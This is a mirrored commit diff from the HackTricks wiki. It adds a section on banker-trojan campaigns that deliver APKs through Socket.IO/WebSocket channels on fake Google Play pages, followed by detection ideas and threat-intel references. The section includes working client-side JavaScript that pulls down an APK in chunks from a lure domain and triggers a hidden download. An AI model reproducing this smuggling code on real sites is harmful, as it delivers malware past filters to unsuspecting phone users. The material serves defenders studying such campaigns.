mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1434 from HackTricks-wiki/update_Banker_Trojan_Targeting_Indonesian_and_Vietnamese__20250925_124652
Banker Trojan Targeting Indonesian and Vietnamese Android Us...
This commit is contained in:
		
						commit
						b5877a948f
					
				| @ -222,6 +222,49 @@ public void onMessageReceived(RemoteMessage msg){ | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages | ||||
| 
 | ||||
| Attackers increasingly replace static APK links with a Socket.IO/WebSocket channel embedded in Google Play–looking lures. This conceals the payload URL, bypasses URL/extension filters, and preserves a realistic install UX. | ||||
| 
 | ||||
| Typical client flow observed in the wild: | ||||
| 
 | ||||
| ```javascript | ||||
| // Open Socket.IO channel and request payload | ||||
| const socket = io("wss://<lure-domain>/ws", { transports: ["websocket"] }); | ||||
| socket.emit("startDownload", { app: "com.example.app" }); | ||||
| 
 | ||||
| // Accumulate binary chunks and drive fake Play progress UI | ||||
| const chunks = []; | ||||
| socket.on("chunk", (chunk) => chunks.push(chunk)); | ||||
| socket.on("downloadProgress", (p) => updateProgressBar(p)); | ||||
| 
 | ||||
| // Assemble APK client‑side and trigger browser save dialog | ||||
| socket.on("downloadComplete", () => { | ||||
|   const blob = new Blob(chunks, { type: "application/vnd.android.package-archive" }); | ||||
|   const url = URL.createObjectURL(blob); | ||||
|   const a = document.createElement("a"); | ||||
|   a.href = url; a.download = "app.apk"; a.style.display = "none"; | ||||
|   document.body.appendChild(a); a.click(); | ||||
| }); | ||||
| ``` | ||||
| 
 | ||||
| Why it evades simple controls: | ||||
| - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. | ||||
| - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. | ||||
| - Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload. | ||||
| 
 | ||||
| Hunting and detection ideas: | ||||
| - Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `<a download>` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts. | ||||
| - Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events. | ||||
| - Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts. | ||||
| 
 | ||||
| See also WebSocket tradecraft and tooling: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../../pentesting-web/websocket-attacks.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| 
 | ||||
| ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study | ||||
| 
 | ||||
| The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques. | ||||
| @ -394,5 +437,8 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new | ||||
| - [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging) | ||||
| - [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats) | ||||
| - [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay) | ||||
| - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) | ||||
| - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) | ||||
| - [Socket.IO](https://socket.io) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user